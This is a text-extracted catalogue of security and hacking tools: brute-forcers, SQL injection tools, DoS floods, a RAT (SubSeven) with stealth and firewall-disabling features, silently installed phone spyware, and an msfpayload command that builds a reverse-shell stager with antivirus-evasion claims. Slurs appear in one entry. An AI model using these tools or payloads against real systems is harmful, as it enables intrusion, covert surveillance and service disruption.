support as many services which allow remote authentication as possible. The author considers following items as some of the key features of t his application: - Thread-based parallel testing. Brute-force testing can be performed against mu ltiple hosts, users or passwords concurrently. - Flexible user input. Target information (host/user/password) can be specified in a variety of ways. For example, each item can be either a single entry or a f ile containing multiple entries. Additionally, a combination file format allows the user to refine their target listing. - Modular design. Each service module exists as an independent .mod file. This m eans that no modifications are necessary to the core application in order to ext end the supported list of services for brute-forcing. Ncrack http://nmap.org/ncrack/ Ncrack is a high-speed network authentication cracking tool. It was built to hel p companies secure their networks by proactively testing all their hosts and net

working devices for poor passwords. Security professionals also rely on Ncrack w hen auditing their clients. Ncrack was designed using a modular approach, a comm and-line syntax similar to Nmap and a dynamic engine that can adapt its behaviou r based on network feedback. It allows for rapid, yet reliable large-scale audit ing of multiple hosts. Ncrack's features include a very flexible interface granting the user full contr ol of network operations, allowing for very sophisticated bruteforcing attacks, timing templates for ease of use, runtime interaction similar to Nmap's and many more. Ncrack was started as a "Google Summer of Code" Project in 2009. While it is alr eady useful for some purposes, it is still unfinished, alpha quality software. * Ncrack can now crack the Remote Desktop Protocol on all Windows versions from XP and above, with the introduction of the RDP module. Users are well advised tr eadhttp://seclists.org/nmap-dev/2010/q3/450 for cracking Windows XP machines sin ce they cant handle many concurrent RDP connections. * Implemented the SMB module which can crack Microsofts SMB/CIFS services as well as UNIX Samba servers. * Introduced the -f option, which forces Ncrack to quit cracking a service after i t finds one credential for it. Specifying the option twice like -f -f will cause N crack tcompletely quit after any credential is found on any service. * Added support for blank-password testing. Ncrack will now test a blank entry w henever it sees an empty line in any of the wordlists. The same behaviour applie s for passing the options user or pass . * Improved the Ncrack scorpion logwith an updated SVG version. RSYaba http://www.randomstorm.com/rsyaba-security-tool.php RSYaba is tool to run brute force attacks against various services in a similar way to Hydra and Medusa. The tool was written after bad experiences at getting e xisting tools working correctly with HTTP and SSH so it was decided to make a to ol that would be easier to configure. Download RSYaba The tool is written in Ruby so modifying the scripts is a lot simpler than havin g to change C/C++ code then recompile. All the modules so far are based on stand ard Ruby gems so they handle all the protocol stuff which means there is a nice level of abstraction for the actual attack framework. While writing the HTTP module, a feature was added that is missing in all the ot her HTTP bruteforcers, the ability to handle authentication that relies on a coo kie already being set and, even stricter, forms that use unique tokens to preven t brute force attacks. The tool currently supports HTTP, MySQL, and SSH and new modules will be added t o it and this page updated accordingly. Windows Credentials Editor http://www.ampliasecurity.com/research.html Windows Credentials Editor (WCE) allows to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes). This can be used, fo r example, to perform pass-the-hash on Windows and also obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) wh ich can be used in further attacks. Supports Windows XP, 2003, Vista, 7 and 2008 (Vista was not actually tested yet, but it should work)

thc-hydra http://freeworld.thc.org/thc-hydra/ A very fast network logon cracker which support many different services Dark Alley Dangerous Kitten http://partyvan.info/wiki/Dangerous_Kitten "Dangerous Kitten" got its name from how it was originally spread--a rar embedde d in a jpg, with the picture of a kitten in a hand, and the subtitle "It's dange rous to go alone, take this". It is a set of tools, many of which already on her e, but there are some new tools that are not anywhere else on the w/i/ki. Tool List (v3 update) * o o o o o o o o o o o o o * o * o Windows (and Wine for Linux and Mac fags) BWraep BWRaeper.NET Forum Proxy Leecher LOIC Longcat Flooder (distributed and standalone) Ping Flood rok/i/ts SMAC Sinflood wgetraep Some gay app to unlimit ip connectiosn SMTP Server All of the new DoS equipment Linux/Unix/Mac pygetraep Web-Based Download links to webservers: WAMP (windows) XAMPP (windows/linux/mac/solaris) and MAMP (mac) o AnonProxy* o FormFlood Form Flooder* o Mail flooder o Miniloader o Myspace phisher o Vampire Raep script o Raid Imagery + Hueg3.jpg + EbaumsWorld.com watermarks + Goatse * Moar new shit o /i/Kit + Hackerpackage included o General updates and a lot of shit added. Items marked with a * are new or updated in the most recent version. shellcodeexec https://github.com/inquisb/shellcodeexec http://bernardodamele.blogspot.com/2011/04/execute-metasploit-payloads-b... = Short description =

shellcodeexec is a small script to execute in memory a sequence of opcodes. = Background = Most of the shellcode launchers out there, including proof of concepts part of many "security" books, detail how to allocate a memory page as readable/writable/executable on POSIX systems, copy over your shellcode and execute it. This works just fine. However, it is limited to POSIX, does not necessarily consider 64-bit architecture and Windows systems. = Description = This script and the relevant project files (Makefile and Visual Studio files) allow you to compile the tool once then run your shellcode across different architectures and operating systems. Moreover, it solves a common real world issue: the target system's anti virus software blocking a Metasploit-generated payload stager (either EXE of ELF). Take for instance the following command line: $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=4444 LHOST=1 92.168.136.1 R | msfencode -a x86 -e x86/shikata_ga_nai -o /tmp/payload.exe -t e xe This generates a Metasploit payload stager, payload.exe, that as soon as it lands on the AV-protected target system is recognized as malicious and potentially blocked (depending on the on-access scan settings) by many anti virus products. At the time of writing this text, 21 out 41 anti viruses detect it as malicious - http://goo.gl/HTw7o. By encoding it multiple times with msfencode, less AV softwares detect it, still a lot. I have been surfing the Net and found some interesting tutorials and guides about packing, compressing, obfuscating and applying IDA-foo to portable executables et similar in order to narrow down the number of AV products that can detect it as a malicious file. This is all interesting, but does not stop few hard-to-die anti viruses to detect your backdoor. So the question is, how cool would it be to have a final solution to avoid all this hassle? This is exactly where this tool comes into play! = Features = shellcodeexec: * Can be compiled and works on POSIX (Linux/Unices) and Windows systems. * Can be compiled and works on 32-bit and 64-bit architectures. * As far as I know, no AV detect it as malicious. * Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx - Readable Writable and eXecutable. * It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit's msfpayload) to Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode.

* Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours. subSeven http://www.subseven.org/home.php SubSeven 2.3 is a simple, easy to use remote administration tool (RAT) designed to work on all current Windows platforms, both 32bit and 64bit. This tool is aim ed at people who want that little bit more power and control over remote compute r management. Please use this tool responsibly and read and accept the disclaime r prior to use. If you do not agree with the disclaimer, please do not use the t ool. You accept full liability and responsibility for your actions when using Su bSeven. Do not use this tool on computers you are not authorized to control. Features overview SubSeven.exe (911KB) Client: - Transfer View (view upload/download details <-> from host) - Window View (View active Windows on SubSeven) Managers: - File Manager (upload/download/run/delete/play files on host) - Registry Manager (modify/add/remove registry entries on host) - Service Manager (refresh services/install services/remove services/remote host management) - Process Manager (view active/kill active processes to dll level) - Fun Manager (general office pranks) Spying: - Desktop (view and click the remote host desktop) - Webcam (view the webcam on the remote host) - Audio (capture mic/line-in input no the remote host) GIF - 2.4 kb Network: - TCP Tunnel (relay remote host ports to local PC) - Traffic Viewer (lists active network connections on remote host) - Network Browser (list shares on remote host, allows mapping) System: - Remote Shell (view the command prompt on the remote host as if it was local) - Password (recover lost/forgotten passwords for various browsers, storage, mail clients and instant messengers) - Installed Apps (list installed applications) - Server Options (stop/start/remove server on remote host) Built in Tools: - Static IP Notification Client (SIN client) (a listening tool that allows your remote hosts to notify you when they are online) - NO-IP account / IP auto update tool (allows you to enter your NO-IP account in

formation to auto update the website of IP changes) - Shortcut Panel (allows you to add your favorite utilities as shortcuts - Hint and Active running status bar (gives you some helpful information) EditServer.exe (254KB) Server Status: - Read (allows you to browse and then read the server settings) - Server extensions (allows you to check which extension you want the server to use) - Install directory (allows you where you would like the server to be installed) - Protect server (allows you to password protect the server) - Melt server (allows the server to disappear once executed) - Wait for reboot (waits to execute upon next reboot) - Run Visible (allows the host computer to know the server is running) - Server name (what it says) Fake Messages: Enable (actives the fake message option) Message icon (allows you to choose your icon for the message) Available buttons (select what options the host computer has to press) Message title (the title text for the message) Message text (the body text of the message) Test (allows you to test the message on your PC)

Startup methods: Registry Run (installs under registry run key) Registry RunServices (installs under registry runservices key) Registry RunOnce (installs under registry runonce key) ActiveX (installs in the activeX key path) Explorer (installs on execution of explorer shell) Winlogon (same as above for winlogon) Policies (executes upon windows policies startup) Key name (keyname for registry entries. For example Remote Host Server)

Notifications: - S.I.N (specify your local network external IP address here, or for local testi ng 127.0.0.1) - CGI/PHP (specify your website address, e.g http://www.host.com, generate the s cript and upload it to your php/cgi host) Bind Files: - Select a file to bind to the server. The binded file will execute along with t he server - for example you may want to execute tinyvnc for full screen manageme nt) Win Firewall: - Disable Firewall (turns off the firewall providing UAC is off) - Disable Win defender (turns off windows defender) - Disable UAC (turns off UAC upon next reboot) Exe Icon: - Load .dll/exe (load up an exe or .dll file to extract icons and use them on yo

ur server) - Browser (browse to .ico files) Server.exe (58.5KB) - This is your configured server to deploy on the remote host. Download >> http://www.firecat.fr/---sys/SubSeven_2.3.rar winAUTOPWN http://blacklistedhosting.com/users/quakerdoomer/v2/w/ winAUTOPWN is an auto (hacking) shell gaining tool. It can also be used to test IDS, IPS and other monitoring sensors/softwares. Autohack your targets with least possible interaction. Features: * Contains already custom-compiled executables of famous and effective exploits alongwith a few original exploits. * No need to debug, script or compile the source codes. * Scans all ports 1 -* 65535 after taking the IP address and tries all possible exploits according to the list of discovered open ports (OpenPorts.TXT) * PortScan is multi-threaded. * Doesnt require any Database at the back-end like others * Can be also be used to test effectiveness of IDS/IPS * Launched exploits are independent and doesnt rely on service fingerprinting (to avoid evasion, if any) Database DB Audit http://www.softtreetech.com/dbaudit/download.htm DB Audit Expert is a professional database auditing solution for Oracle, Sybase, DB2, MySQL and Microsoft SQL Server. DB Audit Expert enables database and syste m administrators, security administrators, auditors and operators to track and a nalyze any database activity including database security, access and usage, data creation, change or deletion. What makes DB Audit really unique is its built-in support for multiple auditing methods giving you the flexibility to choose the best fit for your database security requirements. Features : - Improves system security and ensures system accountability. Captures both regu lar and "back-door" access to audited database systems. - Features centralized auditing control of multiple database systems from a sing le location providing ease of management. - Features unified auditing graphical interface that shortens the learning curve and is easy to use. - Provides analytical reports that reduce large amounts of audit data to compreh ensive summaries thus enabling to easily identify various database security viol ations. - Provides analytical reports that help to identify which processes and users ar e hogging system resources. - Provides audit trail details that are unavailable from native database audit u tilities. - Provides ability to generate real-time email alerts to key personnel when chan ges occur to sensitive data.

- Frees DBA from the need to create and manage finely-tuned database triggers fo r data-change auditing purposes. - Supports flexibility auditing configurations, enabling security personnel to c hoose specific types of database operations and data changes that must be monito red and recorded in the audit trail. - Provides totally transparent system-level and data-change auditing of any exis ting applications without requiring any changes to be made in those applications . - Full compatibility with all host Operation Systems on which the supported data bases can run, including but not limited to Windows NT, UNIX, Linux, VMS, OS/390 , z/OS. ExploitMyUnion http://exploitmyunion.sourceforge.net/ ExploitMyUnion is a tool written in Python with a PyQt user interface made to au tomate sql injection exploitation. Havij http://www.itsecteam.com/en/projects/project1.htm Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software us er can perform back-end database fingerprint, retrieve DBMS users and password h ashes, dump tables and columns, fetching data from the database, running SQL sta tements and even accessing the underlying file system and executing commands on the operating system. The power of Havij that makes it different from similar tools is its injection m ethods. The success rate is more than 95% at injectiong vulnerable targets using Havij. The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users. Features: 1. 1. 2. 3. 4. 5. 6. 7. Supported Databases with injection methods: MsSQL 2000/2005 with error MsSQL 2000/2005 no error (union based) MySQL (union based) MySQL Blind MySQL error based Oracle (union based) MsAccess (union based)

2. Automatic database detection 3. Automatic type detection (string or integer) 4. Automatic keyword detection (finding difference between the positive and nega tive response) 5. Trying different injection syntaxes 6. Proxy support 7. Real time result 8. Options for replacing space by /**/,+,... against IDS or filters 9. Avoid using strings (magic_quotes similar filters bypass) 10 Bypassing illegal union 11 Full customizable http headers (like referer and user agent) 12 Load cookie from site for authentication

13 14 15 16 17 18 19 20 21

Guessing tables and columns in mysql<5 (also in blind) and MsAccess Fast getting tables and columns for mysql Multi thread Admin page finder Multi thread Online MD5 cracker Getting DBMS Informations Getting tables, columns and data Command executation (mssql only) Reading system files (mysql only) insert/update/delete data

OScanner http://www.cqure.net/wp/oscanner/ Oscanner is an Oracle assessment framework developed in Java. It has a plugin-ba sed architecture and comes with a couple of plugins that currently do: Sid Enumeration Passwords tests (common & dictionary) Enumerate Oracle version Enumerate account roles Enumerate account privileges Enumerate account hashes Enumerate audit information Enumerate password policies Enumerate database links

The results are given in a graphical java tree. SFX-SQLi http://www.kachakil.com/papers/sfx-sqli-en.htm SFX-SQLi (Select For XML SQL injection) is a new SQL injection technique which a llows to extract the whole information of a Microsoft SQL Server 2005/2008 datab ase in an extremely fast and efficient way. This technique is based on the FOR XML clause, which is able to convert the cont ent of a table into a single string, so its contents could be appended to some f ield injecting a subquery into a vulnerable input of a web application. Safe3 SQL Injector http://sourceforge.net/projects/safe3si/ Safe3 SQL Injector is one of the most powerful penetration testing tool that aut omates the process of detecting and exploiting SQL injection flaws and taking ov er of back-end database servers. his is a list of the available features: * Full support for * Full support for * Full support for * Full support for * Support for file ack,etc. * Super bypass WAF Scrawlr https://h30406.www3.hp.com/campaigns/2008/wwcampaign/1-57C4K/index.php Scrawlr, developed by the HP Web Security Research Group in coordination with th GET/Post/Cookie Injection HTTP Basic, Digest, NTLM and Certificate authentications MySQL, Oracle, PostgreSQL,MSSQL,ACESS,DB2,Sybase,Sqlite Error/Union/Blind/Force SQL injection acess,command execute,ip domain reverse,web path guess,md5 cr

e MSRC, is short for SQL Injector and Crawler. Scrawlr will crawl a website whil e simultaneously analyzing the parameters of each individual web page for SQL In jection vulnerabilities. Scrawlr is lightning fast and uses our intelligent engi ne technology to dynamically craft SQL Injection attacks on the fly. It can even provide proof positive results by displaying the type of backend database in us e and a list of available table names. Toolza http://pentestit.com/2010/03/22/toolza-sql-injection-tool-options/ Toolza - SQL Injection Tool with many options Features of toolza: - LFI/Reader/Loade_file() bruter - Scan site for folders & files - FTP checker - FTP bruter - Proxy checker - Proxy grabber Post/Get/Proxy/SOCKS4-5/Cookies/Timeout/Multithread/HTTPS+Authorization supporte d - Select POST or GET - Support for proxy (file proxy.txt) avtocheking, working with the first working - Support for SOCKS4-5 (file socks.txt) avtocheking, auto-sensing type socks (45), without authorization, working with the first working - Select a timeout connection - Ability to insert cookies - Ability to change user agent - Ability to change the referrer - Ability to select HTTP-protocol (0 HTTP/1.0; 1 HTTP/1.1; Default 1) bsqlbf http://code.google.com/p/bsqlbf-v2/ This perl script allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer an d string based injections. Databases supported: 0. MS-SQL 1. MySQL 2. PostgreSQL 3. Oracle The tool supports 8 attack modes(-type switch):Type 0: Blind SQL Injection based on true and false conditions returned by backend server Type 1: Blind SQL Injection based on true and error(e.g syntax error) returned b y back-end server. Type 2: Blind SQL Injection in "order by" and "group by". Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploi t) Type 4: is O.S code execution (ORACLE dbms_export_extension exploit)

Type 5: is reading files (ORACLE dbms_export_extension exploit, based on java) Type 6: is O.S code execution DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit Type 7: is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), DBA Privs -cmd=revshell Type 7 supports meterpreter payload execution, run generator.exe f irst Type 8: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions -cmd=revshell Type 8 supports meterpreter payload execution, run generator.exe f irst hexjector http://sourceforge.net/projects/hexjector/ Hexjector is an Opensource,Multi-Platform PHP script to automate site Pentest fo r SQL Injection Vulnerabilties. sqlmap http://sqlmap.sourceforge.net/ sqlmap is an open source command-line automatic SQL injection tool. Its goal is to detect and take advantage of SQL injection vulnerabilities in web application s. Once it detects one or more SQL injections on the target host, the user can c hoose among a variety of options to perform an extensive back-end database manag ement system fingerprint, retrieve DBMS session user and database, enumerate use rs, password hashes, privileges, databases, dump entire or user's specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, es tablish an out-of-band stateful connection between the attacker box and the data base server via Metasploit payload stager, database stored procedure buffer over flow exploitation or SMB relay attack and more. sqlninja http://sqlninja.sourceforge.net/ qlninja is a tool to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Its main goal is to provide an i nteractive access on the vulnerable DB server, even in a very hostile environmen t. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered. Features * Fingerprint of the remote SQL Server (version, user performing the queries, us er privileges, xp_cmdshell availability, DB authentication mode) * Bruteforce of sa password (in 2 flavors: dictionary-based and incremental) * Privilege escalation to sysadmin group if sa password has been found * Creation of a custom xp_cmdshell if the original one has been removed * Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed) * TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell * Direct and reverse bindshell, both TCP and UDP * DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/re verse shell, but the DB server can resolve external hostnames

* Evasion techniques to confuse a few IDS/IPS/WAF * Integration with Metasploit3, to obtain a graphical access to the remote DB se rver through a VNC server injection Inguma http://code.google.com/p/inguma/ nguma is a penetration testing toolkit entirely written in python. The framework includes modules to discover hosts, gather information about, fuzz targets, bru te force user names and passwords and, of course, exploits. While the current exploitation capabilities in Inguma may be limited, this progr am provides numerous tools for information gathering and target auditing. Inguma is still being heavily developed so be sure to stay current and check back for news and updates. Mobile (OAT) OCS Assessment Tool http://voat.sourceforge.net/ OAT is an Open Source Security tool designed to check the password strength of M icrosoft Office Communication Server users. After a password is compromised, OAT demonstrates potential UC attacks that can be performed by legitimate users if proper security controls are not in place. NeoPwn http://www.neopwn.com/ The first network auditing distribution for mobile phone released. The NeoPwn Mobile Pentesting project is proud to announce that it is merging wit h BackTrack, to produce the first ever BackTrack Mobile suite! Phone Creeper http://forum.xda-developers.com/showthread.php?t=527423 Phone Creeper is a phone espionage suite It can be silently installed by just in serting an sd card with the files below on it. The program does not show up under installed programs or running programs and al lows for a useful array or features. Phones running this software can be remotel y controled by sms text messages. All commands will be silently received and del eted immediately and results will be issued back to sender. Pre-configured settings can be added to the installer to have your own default p assword and phone number to receive live updates. By default, this program will silently reinstall itself even after a hard reset, if the memory card with these files is still in the device. Multipurpose FireCat http://sourceforge.net/projects/firecatpackage/ FireCAT (Firefox Catalog of Auditing exTension) is a mindmap collection of the m ost efficient and useful firefox extensions oriented application security auditi ng and assessment. FireCAT is not a remplacement of other security utilities and softwares as well as fuzzers, proxies and application vulnerabilities scanners. PeachFuzzer

http://peachfuzzer.com/ Peach is a SmartFuzzer that is capable of performing both generation and mutatio n based fuzzing. Peach requires the creation of PeachPit files that define the structure, type in formation, and relationships in the data to be fuzzed. It additionally allows fo r the configuration of a fuzzing run including selecting a data transport (Publi sher), logging interface, etc. http://peachfuzzer.com/PeachQuickstart Scapy https://www.secdev.org/projects/scapy/ Scapy is a powerful interactive packet manipulation tool, packet generator, netw ork scanner, network discovery tool, and packet sniffer. It provides classes to interactively create packets or sets of packets, manipulate them, send them over the wire, sniff other packets from the wire, match answers and replies, and mor e. Interaction is provided by the Python interpreter, so Python programming stru ctures can be used (such as variables, loops, and functions). Report modules are possible and easy to make. It is intended to do the same things as ttlscan, nma p, hping, queso, p0f, xprobe, arping, arp-sk, arpspoof, firewalk, irpas, tethere al, tcpdump, etc. SpiderLab Tools https://www.trustwave.com/spiderLabs-tools.php SpiderLabs has developed dozens of tools over the years. Most of them end up as internal-only tools since they eventually make their way into one of Trustwave's product offerings. hping http://www.hping.org/ hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping(8) unix command, but hping isn't only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a tracerout e mode, the ability to send files between a covered channel, and many other feat ures. While hping was mainly used as a security tool in the past, it can be used in ma ny ways by people that don't care about security to test networks and hosts. A s ubset of the stuff you can do using hping: * * * * * * * * * Firewall testing Advanced port scanning Network testing, using different protocols, TOS, fragmentation Manual path MTU discovery Advanced traceroute, under all the supported protocols Remote OS fingerprinting Remote uptime guessing TCP/IP stacks auditing hping can also be useful to students that are learning TCP/IP.

pentbox http://www.pentbox.net/ PenTBox is a Security Suite that packs a lot of security and stability testing o riented programs for networks and systems. For example, the Suite has Honeypot, TCP Flood Denial of Service testing tools,

Secure Instant Messaging, Port Scanner, Fuzzer, Secure passwords generator and m ore. All programs are being developed by PenTBox Team and the contributors of the Fre e Software community to the project. Programmed in Ruby, and oriented to GNU/Linux systems (but compatible with Windo ws, MacOS and more). It is free, licensed under GNU/GPLv3. Network 6tunnel http://toxygen.net/6tunnel/ 6tunnel allows you to use services provided by IPv6 hosts with IPv4-only applica tions and vice-versa. It can bind to any of your IPv4 (default) or IPv6 addresse s and forward all data to IPv4 or IPv6 (default) host. DDOSIM http://sourceforge.net/projects/ddosim/ Application Layer DDoS Simulator ddosim is a tool that can be used in a laboratory environment to simulate a dist ributed denial of service (DDOS) attack against a target server. The test will s how the capacity of the server to handle application specific DDOS attacks. ddos im simulates several zombie hosts (having random IP addresses) which create full TCP connections to the target server. After completing the connection, ddosim s tarts the conversation with the listening application (e.g. HTTP server). ddosim is written in C++ and runs on Linux. Its current functionalities include: * * * * HTTP DDoS with valid requests HTTP DDoS with invalid requests (similar to a DC++ attack) SMTP DDoS TCP connection flood on random port

Echo Mirage http://www.bindshell.net/tools/echomirage Echo Mirage is a generic network proxy. It uses DLL injection and function hooki ng techniques to redirect network related function calls so that data transmitte d and received by local applications can be observed and modified. Windows encryption and OpenSSL functions are also hooked so that plain text of d ata being sent and received over an encrypted session is also available. Traffic can be intercepted in real-time, or manipulated with regular expressions and action scripts Low Orbit Ion Cannon http://sourceforge.net/projects/loic/ Low Orbit Ion Cannon (LOIC) is an open source program written in McDonald's Visu al C# coding environment. It is used for DDoSing websites and testing server sec urity. LOIC (Low Orbit Ion Cannon) is a network stress testing application, written in C# and developed by "praetox". It attempts a denial-of-service attack on the tar get site by flooding the server with TCP packets, UDP packets, or HTTP requests with the intention of disrupting the service of a particular host. The program w

as exploited during Project Chanology to attack Scientology websites, and is cur rently being used by Operation Avenge Assange (Organized by Operation Payback) t o attack the websites of companies and organizations that have opposed WikiLeaks http://insurgen.info/wiki/Low_Orbit_Ion_Cannon http://www.partyvan.info/wiki/Low_Orbit_Ion_Cannon Mausezahn http://www.perihel.at/sec/mz/ Mausezahn is a free fast traffic generator written in C which allows you to send nearly every possible and impossible packet. It is mainly used to test VoIP or multicast networks but also for security audits to check whether your systems ar e hardened enough for specific attacks. Mausezahn can be used for example: * As traffic generator (e. g. to stress multicast networks) * To precisely measure jitter (delay variations) between two hosts (e. g. for Vo IP-SLA verification) * As didactical tool during a datacom lecture or for lab exercises * For penetration testing of firewalls and IDS * For DoS attacks on networks (for audit purposes of course) * To find bugs in network software or appliances * For reconnaissance attacks using ping sweeps and port scans * To test network behaviour under strange circumstances (stress test, malformed packets, ...) ...and more. Mausezahn is basically a versatile packet creation tool on the comm and line with a simple syntax and context help. It could also be used within (ba sh-) scripts to perform combination of tests. By the way, Mausezahn is quite fas t; when started on my old PIII-Laptop (1.4 GHz, Gigabit Ethernet) I measured 755 Mbit/s using the interface packet counters of an HP ProCurve 5400 switch. Naptha http://netexpect.org/wiki/Naptha TCP State Exhaustion Testing With Network Expect - The Naptha vulnerabilities ar e a type of denial-of-service vulnerabilities researched and documented by Bob K eyes of BindView's RAZOR Security Team in 2000. The vulnerabilities exist in som e implementations of the TCP protocol, specifically in the way some TCP implemen tations keep track of the state of TCP connections, and allow an attacker to exh aust the resources of a system under attack without utilizing much resources on the system used to launch the attack. OpenDPI http://code.google.com/p/opendpi/ The OpenDPI engine, released under the LGPL license, differs from ipoques commerc ial scanning engine in its high-priced DPI hardware. The open-source version is much slower and (more importantly) doesnt reveal ipoques methods for identifying e ncrypted transmissions. DPI vendors all claim high levels of success at identify ing such traffic based on the flow patterns and handshake signatures common to p rotocols like BitTorrent and Skype, even if they cannot crack the encryption and examine the content of those transmissions. Pyloris http://motomastyle.com/pyloris/ PyLoris is a tool for testing a web servers vulnerability to a particular class o f Denial of Service (DoS) attacks. It uses the Slowloris method; by using all av

ailable connections, web servers cannot complete valid requests. PyLoris is a scriptable tool for testing a web servers vulnerability to Denial of Service (DoS) attacks which supports SOCKS, SSL, and all HTTP request methods. It uses the Slowloris method. QuickRecon http://code.google.com/p/quickrecon/ QuickRecon is a simple information gathering tool that allows you to: * * * * Bruteforce subdomains of a target domain Perform zone transfer Gather email addresses from Google.com and Bing.com Find human relationships using XHTML Friends Network (microformats)

RawCap http://www.netresec.com/?page=RawCap RawCap is a free command line network sniffer for Windows that uses raw sockets. Properties of RawCap: Can sniff any interface that has got an IP address, including 127.0.0.1 (localho st/loopback) RawCap.exe is just 17 kB No external libraries or DLL's needed other than .NET Framework 2.0 No installation required, just download RawCap.exe and sniff Can sniff most interface types, including WiFi and PPP interfaces Minimal memory and CPU load Reliable and simple to use Usage You will need to have administrator privileges to run RawCap. Rebind http://code.google.com/p/rebind/ Rebind is a DNS rebinding tool, that implements the multiple A record DNS rebindin g attacks. It can let you access a target routers internal Web interface! The bes t part is remote administration does not need to be enabled for this attack to w ork! All that is required is that a user inside the target network surf to a Web site that is controlled, or has been compromised, by you. You could possibly us e social engineering tricks to trick a user into viewing this web site. It does not require prior knowledge of the target router or the routers configuration set tings such as make, model, IP address, host name, etc, and does not use any anti -DNS pinning techniques. Rebind integrates a DNS server, two Web servers and an HTTP proxy server into a single Linux binary. DNS Rebinding Now, how do you get it to work. In the authors words Actually, you need to configure your domain to use Rebind as your primary DNS ser ver. This is done in two steps: first, you need to register the machine that you intend to run Rebind from as a nameserver, then you must configure your domain to use that nameserver. Most registrars will let you perform both of these actio ns, although some dont and many make it difficult to find these settings, so you may have to search around a little.

Go to the registrar where you registered your domain name (Host-Unlimited, GoDad dy, Yahoo, etc.) and first register two nameservers. You will want to register t wo because most registrars will require your domain to have at least two nameser vers, and you want Rebind to handle all DNS lookups. Name the nameservers ns1 an d ns2 and set their IP addresses to that of the machine from where you intend to run Rebind. Once you have registered your nameservers, go do your domain DNS settings and se t these nameservers as the authoritative nameservers for your domain. If for exa mple your domain is mydomain.com, you will enter ns1.mydomain.com and ns2.mydomain .com. Now all DNS traffic will be directed to the machine where you intend to ru n Rebind, which will allow Rebind to accept and handle all DNS requests for your domain. Rebind has been specially programmed to work with only Linux operating systems. So, it might work on BSD, but NOT on Windows. It will also work on 64-bit operat ing systems. Only pre-requisite is that, it must be run as root, and you must ha ve iptables installed and listed in $PATH. It has all images filtered out. It wi ll not work with IPv6 either. Considering that we have another year for IPv6 to be popular, we might as well play with it for now! Remember! You have to have the end-user visit http://your-domain-name/init and n ot just http://your-domain-name/. (We actually were left wondering about that!) SSL Capable NetCat http://gomor.org/bin/view/GomorOrg/SslNetcat You all know what is netcat (written by Hobbit in 1996), how to use it and that it should have been integrated in all UNIX systems a long time ago. netcat lacke d some features, and I tried to add them in this Perl version. For example, SSL support, TCP and UDP proxying and IPv4/IPv6 proxying features. This is now done, unless I missed a bug. Now, enjoy. ShareScan http://www.mcafee.com/us/downloads/free-tools/sharescan.aspx ShareScan is a free utility that enables IT security personnel to identify open Windows file shares available on the internal network. This tool can help admini strators identify systems that have wide open permissions or no permissions pote ntial vulnerabilities that should be remediated. Slowloris http://ha.ckers.org/slowloris/ Slowloris HTTP DoS T50 Sukhoi PAK FA http://www.4shared.com/dir/wlw1Gawh/NB_Research_Labs.html T50 Sukhoi PAK FA Mixed Packet Injector (a.k.a. F22 Raptor) is a tool designed t o perform stress testing. It is a powerful and an unique packet injection tool, that is capable of: * Send sequentially (i.e., ALMOST on the same time) the following protocols: 1. 2. 3. 4. ICMP Internet Control Message Protocol IGMP Internet Group Management Protocol TCP Transmission Control Protocol UDP User Datagram Protocol

* Send a (quite) incredible amount of packets per second, making it a second to n one tool: 1. More than 1,000,000 pps of SYN Flood (+60% of the networks uplink) in a 1000BA SE-T Network (Gigabit Ethernet). 2. More than 120,000 pps of SYN Flood (+60% of the networks uplink) in a 100BASETX Network (Fast Ethernet). * Perform Stress Testing on a variety of network infrastructure, network devices a nd security solutions in place. * Simulate Denial-of-Service attacks, validating the Firewall rules and Intrusio n Detection System/Intrusion Prevention System policies. Wont say a lot about this just download and see for yourself the power of this t ool. Oh! Did we forget to tell you that this is an open source tool, programmed in C? THC-IPV6 http://freeworld.thc.org/thc-ipv6/ A complete tool set to attack the inherent protocol weaknesses of IPV6 and ICMP6 , and includes an easy to use packet factory library. Please note to get full ac cess to all the available tools you need to develop IPV6 tools yourself or submi t patches, tools and feedback to the thc-ipv6 project. UDP Unicorn http://sourceforge.net/projects/udpunicorn/ A Win32 UDP flooding/DoS (Denial of Service) utility with multithreading. Uses w insock library to create UDP sockets and flood a target. For network security te sting. Yersinia http://www.yersinia.net/ Yersinia is a network tool designed to take advantage of some weakeness in diffe rent network protocols. It pretends to be a solid framework for analyzing and te sting the deployed networks and systems. Currently, there are some network protocols implemented, but others are coming ( tell us which one is your preferred). Attacks for the following network protocol s are implemented (but of course you are free for implementing new ones): * * * * * * * * * Spanning Tree Protocol (STP) Cisco Discovery Protocol (CDP) Dynamic Trunking Protocol (DTP) Dynamic Host Configuration Protocol (DHCP) Hot Standby Router Protocol (HSRP) IEEE 802.1Q IEEE 802.1X Inter-Switch Link Protocol (ISL) VLAN Trunking Protocol (VTP)

